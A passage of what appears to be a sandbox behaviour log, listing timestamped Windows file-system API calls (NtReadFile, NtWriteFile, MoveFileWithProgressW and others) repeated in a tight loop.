"filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,945", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,976", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,986", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,996", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,006", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,026", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,036", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,056", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,096", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,156", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 